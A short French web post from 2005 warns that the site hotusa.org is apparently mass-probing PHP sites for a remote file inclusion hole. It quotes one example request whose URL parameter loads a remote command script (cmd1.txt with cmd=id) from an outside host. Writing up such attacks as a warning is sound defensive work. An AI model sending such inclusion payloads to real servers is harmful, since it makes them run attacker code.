Tentative d'attaque provenant de hotusa.org
Publi� le 11 mars 2005

Le site hotusa.org [1], probablement un site porno, effectue des attaques contre des sites mal conçus en tentant d'exécuter un script sur le serveur web. C'est une « porte ouverte » du langage PHP qui permet d'exécuter un script PHP qui est en dehors du domaine.

Le principe de l'attaque est de lancer massivement des requêtes dans une liste de sites récupérée très facilement à partir des moteurs de recherche.

Ex :

www.votresite.fr/index.php?[variable]=http://hux0x.hotusa.org/cmd1.txt?&cmd=id

Pour se protéger, voir le code ici.


[1] évitez d'aller voir si vous ne voulez pas être envahi soudainement par des virus